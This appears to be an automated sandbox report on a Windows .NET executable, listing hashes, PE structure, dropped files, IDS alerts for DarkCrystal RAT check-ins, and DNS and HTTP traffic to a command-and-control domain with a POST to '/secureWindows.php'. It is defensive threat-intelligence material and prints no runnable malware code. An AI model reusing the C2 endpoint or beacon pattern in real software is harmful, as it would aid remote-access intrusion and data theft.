Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'g................................. ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text....... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H...........D............................................................0..........(.... ........8........E....8...9.......)...83...(.... ....~....{j...:....& ....8....(.... ....8....(.... ....~....{....:....& ....8........0.......... ........8........E....9...-...........z...84......... ........8....~....:.... ....8....r...ps....z....~....(6...~....(:... ....?.... ....~....{....:x...& ....8m...~....(.... .... .... ....s....~....(2....... ....~....{....:-...& ....8".....(.

C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

\Device\Null

Download File

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.8108490892806826
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FXAQvdJuhqEKvpTzvj:Vx993DEUpx+
MD5:	FB5F65C4DBD9C470DA74D12DF43D88B5
SHA1:	98D93A56AB9EA4F707C06BA398DB620873BA2208
SHA-256:	7FC7C47ADFDE9EB4A6EE0249954C38B96471A8C98E8613F3AC2A39E1C6F3A199
SHA-512:	248DD62D423BA55673C1EEA4627A9B846BD4A7D8F80FF0BFD1E8D96635355F47EA2307D6D031A335BDB7F1E768C147ECE6F7FCA5F9FA93CFD2EE1130989F49D4
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 13/01/2025 08:44:43..08:44:43, error: 0x80072746.08:44:48, error: 0x80072746.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.44326681578664
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	bridgenet.exe.bin.exe
File size:	1'685'504 bytes
MD5:	13a9fe232c423531f428e7ebf5bcc3ce
SHA1:	7940d3296d943f8f54e6d2e58982812de6f66a79
SHA256:	3e60ac6ac6c4fc9f90b87dde23d1261ac236782de1b00cca97bdf950019ee3a3
SHA512:	ed6f68b31f034c49b6ef9a79a793d5ba46d6a8cffca33f1f5cdbb3db51ac6ae9ea5aa39ea7dede138c832b2a47c9f484441f549b163254bdbf5566a4590042f5
SSDEEP:	24576:Dl2UpmjCMYU6XtQCBRSybXZgRRNsSSzUcYUHcAtRTjeXRE7QSvMllsWH4Xsmnobb:BdtdQCBRZX3HYUPtRTjmcQSTWH4Xshb
TLSH:	3F759D06A6924F33C6A4173541A7013ED291DB227926EF1B7A1F10D3A90B7F18BA35F7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....'g................................. ........@.. ....................... ............@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x59cede
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x672793EF [Sun Nov 3 15:17:03 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x19ce90	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x19e000	0x320	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1a0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x19aee4	0x19b000	601813042d14f0b254abec40fd85d073	False	0.7481128107892335	data	7.4472620832668825	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x19e000	0x320	0x400	cc9c29dd08f1f9eac6e163c3743ab007	False	0.353515625	data	2.6537284131589467	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x1a0000	0xc	0x200	cd43da550e80cc2263c9d895dee98064	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x19e058	0x2c8	data			0.46207865168539325

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-13T13:33:16.502249+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.9	49814	104.21.112.1	80	TCP
2025-01-13T13:33:34.408634+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.9	49917	104.21.112.1	80	TCP
2025-01-13T13:33:42.533672+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.9	49962	104.21.112.1	80	TCP
2025-01-13T13:33:47.083680+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.9	49975	104.21.112.1	80	TCP
2025-01-13T13:33:50.533693+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.9	49976	104.21.112.1	80	TCP
2025-01-13T13:33:55.520980+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.9	49978	104.21.112.1	80	TCP
2025-01-13T13:34:00.033812+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.9	49979	104.21.112.1	80	TCP
2025-01-13T13:34:17.222015+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.9	49980	104.21.112.1	80	TCP
2025-01-13T13:34:25.225070+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.9	49981	104.21.112.1	80	TCP
2025-01-13T13:34:49.909081+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.9	49982	104.21.112.1	80	TCP
2025-01-13T13:34:57.971637+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.9	49983	104.21.112.1	80	TCP
2025-01-13T13:35:01.893652+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.9	49984	104.21.112.1	80	TCP
2025-01-13T13:35:05.018538+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.9	49985	104.21.112.1	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 13:33:15.993247032 CET	49814	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:15.998127937 CET	80	49814	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:15.998265982 CET	49814	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:15.998692036 CET	49814	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:16.003413916 CET	80	49814	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:16.357552052 CET	49814	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:16.362449884 CET	80	49814	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:16.453470945 CET	80	49814	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:16.502249002 CET	49814	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:16.683933020 CET	80	49814	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:16.736644030 CET	49814	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:17.593811989 CET	49814	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:33.921786070 CET	49917	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:33.927159071 CET	80	49917	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:33.927252054 CET	49917	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:33.927545071 CET	49917	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:33.932861090 CET	80	49917	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:34.283857107 CET	49917	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:34.288921118 CET	80	49917	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:34.367388964 CET	80	49917	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:34.408633947 CET	49917	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:34.617224932 CET	80	49917	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:34.658607960 CET	49917	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:34.902030945 CET	49917	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:42.008243084 CET	49962	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:42.013073921 CET	80	49962	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:42.013158083 CET	49962	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:42.014729977 CET	49962	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:42.019519091 CET	80	49962	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:42.394068956 CET	49962	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:42.398875952 CET	80	49962	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:42.479079962 CET	80	49962	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:42.533672094 CET	49962	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:42.718708992 CET	80	49962	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:42.768029928 CET	49962	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:42.950067997 CET	49962	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:46.393309116 CET	49975	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:46.420448065 CET	80	49975	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:46.420510054 CET	49975	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:46.420881033 CET	49975	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:46.425638914 CET	80	49975	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:46.769224882 CET	49975	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:46.774143934 CET	80	49975	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:46.922472000 CET	80	49975	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:47.083679914 CET	49975	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:47.145268917 CET	80	49975	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:47.221199036 CET	49975	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:47.842231989 CET	49975	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:50.002080917 CET	49976	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:50.008388042 CET	80	49976	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:50.008513927 CET	49976	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:50.008907080 CET	49976	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:50.013679981 CET	80	49976	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:50.362536907 CET	49976	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:50.367382050 CET	80	49976	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:50.458343029 CET	80	49976	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:50.533693075 CET	49976	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:50.678941965 CET	80	49976	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:50.721204042 CET	49976	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:51.001766920 CET	49976	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:55.012830973 CET	49978	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:55.017900944 CET	80	49978	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:55.018018007 CET	49978	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:55.018521070 CET	49978	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:55.023423910 CET	80	49978	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:55.377774000 CET	49978	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:55.383836031 CET	80	49978	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:55.470283031 CET	80	49978	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:55.520979881 CET	49978	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:55.714998960 CET	80	49978	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:55.830648899 CET	49978	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:56.234371901 CET	49978	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:59.335014105 CET	49979	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:59.444952011 CET	80	49979	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:59.445031881 CET	49979	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:59.445557117 CET	49979	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:59.450335979 CET	80	49979	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:59.799716949 CET	49979	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:33:59.804709911 CET	80	49979	104.21.112.1	192.168.2.9
Jan 13, 2025 13:33:59.897567034 CET	80	49979	104.21.112.1	192.168.2.9
Jan 13, 2025 13:34:00.033812046 CET	49979	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:34:00.130917072 CET	80	49979	104.21.112.1	192.168.2.9
Jan 13, 2025 13:34:00.221313000 CET	49979	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:34:00.423305988 CET	49979	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:34:16.708327055 CET	49980	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:34:16.713243961 CET	80	49980	104.21.112.1	192.168.2.9
Jan 13, 2025 13:34:16.713311911 CET	49980	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:34:16.713641882 CET	49980	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:34:16.718406916 CET	80	49980	104.21.112.1	192.168.2.9
Jan 13, 2025 13:34:17.070949078 CET	49980	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:34:17.075802088 CET	80	49980	104.21.112.1	192.168.2.9
Jan 13, 2025 13:34:17.160456896 CET	80	49980	104.21.112.1	192.168.2.9
Jan 13, 2025 13:34:17.222014904 CET	49980	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:34:17.400135040 CET	80	49980	104.21.112.1	192.168.2.9
Jan 13, 2025 13:34:17.534192085 CET	49980	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:34:18.279078007 CET	49980	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:34:24.630990982 CET	49981	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:34:24.635989904 CET	80	49981	104.21.112.1	192.168.2.9
Jan 13, 2025 13:34:24.636328936 CET	49981	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:34:24.636328936 CET	49981	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:34:24.641130924 CET	80	49981	104.21.112.1	192.168.2.9
Jan 13, 2025 13:34:24.988166094 CET	49981	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:34:24.993165970 CET	80	49981	104.21.112.1	192.168.2.9
Jan 13, 2025 13:34:25.079279900 CET	80	49981	104.21.112.1	192.168.2.9
Jan 13, 2025 13:34:25.225070000 CET	49981	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:34:25.303446054 CET	80	49981	104.21.112.1	192.168.2.9
Jan 13, 2025 13:34:25.419461012 CET	49981	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:34:49.398009062 CET	49982	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:34:49.403733015 CET	80	49982	104.21.112.1	192.168.2.9
Jan 13, 2025 13:34:49.403839111 CET	49982	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:34:49.404059887 CET	49982	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:34:49.409739017 CET	80	49982	104.21.112.1	192.168.2.9
Jan 13, 2025 13:34:49.773576975 CET	49982	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:34:49.778599024 CET	80	49982	104.21.112.1	192.168.2.9
Jan 13, 2025 13:34:49.861040115 CET	80	49982	104.21.112.1	192.168.2.9
Jan 13, 2025 13:34:49.909080982 CET	49982	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:34:50.089639902 CET	80	49982	104.21.112.1	192.168.2.9
Jan 13, 2025 13:34:50.143610954 CET	49982	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:34:50.318954945 CET	49982	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:34:57.457195044 CET	49983	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:34:57.467242002 CET	80	49983	104.21.112.1	192.168.2.9
Jan 13, 2025 13:34:57.467564106 CET	49983	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:34:57.467564106 CET	49983	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:34:57.473303080 CET	80	49983	104.21.112.1	192.168.2.9
Jan 13, 2025 13:34:57.818169117 CET	49983	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:34:57.827231884 CET	80	49983	104.21.112.1	192.168.2.9
Jan 13, 2025 13:34:57.925517082 CET	80	49983	104.21.112.1	192.168.2.9
Jan 13, 2025 13:34:57.971637011 CET	49983	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:34:58.150898933 CET	80	49983	104.21.112.1	192.168.2.9
Jan 13, 2025 13:34:58.205995083 CET	49983	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:34:58.414479971 CET	49983	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:35:00.424552917 CET	49984	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:35:01.397617102 CET	80	49984	104.21.112.1	192.168.2.9
Jan 13, 2025 13:35:01.397696018 CET	49984	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:35:01.398030043 CET	49984	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:35:01.403034925 CET	80	49984	104.21.112.1	192.168.2.9
Jan 13, 2025 13:35:01.753329992 CET	49984	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:35:01.758594990 CET	80	49984	104.21.112.1	192.168.2.9
Jan 13, 2025 13:35:01.852637053 CET	80	49984	104.21.112.1	192.168.2.9
Jan 13, 2025 13:35:01.893651962 CET	49984	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:35:02.080626965 CET	80	49984	104.21.112.1	192.168.2.9
Jan 13, 2025 13:35:02.127935886 CET	49984	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:35:02.166960955 CET	49984	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:35:04.496541977 CET	49985	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:35:04.501661062 CET	80	49985	104.21.112.1	192.168.2.9
Jan 13, 2025 13:35:04.501755953 CET	49985	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:35:04.502047062 CET	49985	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:35:04.506903887 CET	80	49985	104.21.112.1	192.168.2.9
Jan 13, 2025 13:35:04.847848892 CET	49985	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:35:04.852760077 CET	80	49985	104.21.112.1	192.168.2.9
Jan 13, 2025 13:35:04.967708111 CET	80	49985	104.21.112.1	192.168.2.9
Jan 13, 2025 13:35:05.018537998 CET	49985	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:35:05.203381062 CET	80	49985	104.21.112.1	192.168.2.9
Jan 13, 2025 13:35:05.253227949 CET	49985	80	192.168.2.9	104.21.112.1
Jan 13, 2025 13:35:05.286102057 CET	49985	80	192.168.2.9	104.21.112.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 13:33:15.963253975 CET	62325	53	192.168.2.9	1.1.1.1
Jan 13, 2025 13:33:15.977691889 CET	53	62325	1.1.1.1	192.168.2.9
Jan 13, 2025 13:33:28.301297903 CET	65038	53	192.168.2.9	1.1.1.1
Jan 13, 2025 13:33:28.313667059 CET	53	65038	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 13, 2025 13:33:15.963253975 CET	192.168.2.9	1.1.1.1	0xb881	Standard query (0)	977255cm.nyashkoon.in	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:33:28.301297903 CET	192.168.2.9	1.1.1.1	0x1e1a	Standard query (0)	977255cm.nyashkoon.in	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 13, 2025 13:32:55.309488058 CET	1.1.1.1	192.168.2.9	0x9eae	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 13, 2025 13:32:55.309488058 CET	1.1.1.1	192.168.2.9	0x9eae	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:33:15.977691889 CET	1.1.1.1	192.168.2.9	0xb881	No error (0)	977255cm.nyashkoon.in		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:33:15.977691889 CET	1.1.1.1	192.168.2.9	0xb881	No error (0)	977255cm.nyashkoon.in		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:33:15.977691889 CET	1.1.1.1	192.168.2.9	0xb881	No error (0)	977255cm.nyashkoon.in		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:33:15.977691889 CET	1.1.1.1	192.168.2.9	0xb881	No error (0)	977255cm.nyashkoon.in		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:33:15.977691889 CET	1.1.1.1	192.168.2.9	0xb881	No error (0)	977255cm.nyashkoon.in		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:33:15.977691889 CET	1.1.1.1	192.168.2.9	0xb881	No error (0)	977255cm.nyashkoon.in		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:33:15.977691889 CET	1.1.1.1	192.168.2.9	0xb881	No error (0)	977255cm.nyashkoon.in		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:33:28.313667059 CET	1.1.1.1	192.168.2.9	0x1e1a	No error (0)	977255cm.nyashkoon.in		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:33:28.313667059 CET	1.1.1.1	192.168.2.9	0x1e1a	No error (0)	977255cm.nyashkoon.in		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:33:28.313667059 CET	1.1.1.1	192.168.2.9	0x1e1a	No error (0)	977255cm.nyashkoon.in		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:33:28.313667059 CET	1.1.1.1	192.168.2.9	0x1e1a	No error (0)	977255cm.nyashkoon.in		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:33:28.313667059 CET	1.1.1.1	192.168.2.9	0x1e1a	No error (0)	977255cm.nyashkoon.in		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:33:28.313667059 CET	1.1.1.1	192.168.2.9	0x1e1a	No error (0)	977255cm.nyashkoon.in		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:33:28.313667059 CET	1.1.1.1	192.168.2.9	0x1e1a	No error (0)	977255cm.nyashkoon.in		104.21.96.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

977255cm.nyashkoon.in

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49814	104.21.112.1	80	3720	C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:33:15.998692036 CET	326	OUT	POST /secureWindows.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 977255cm.nyashkoon.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
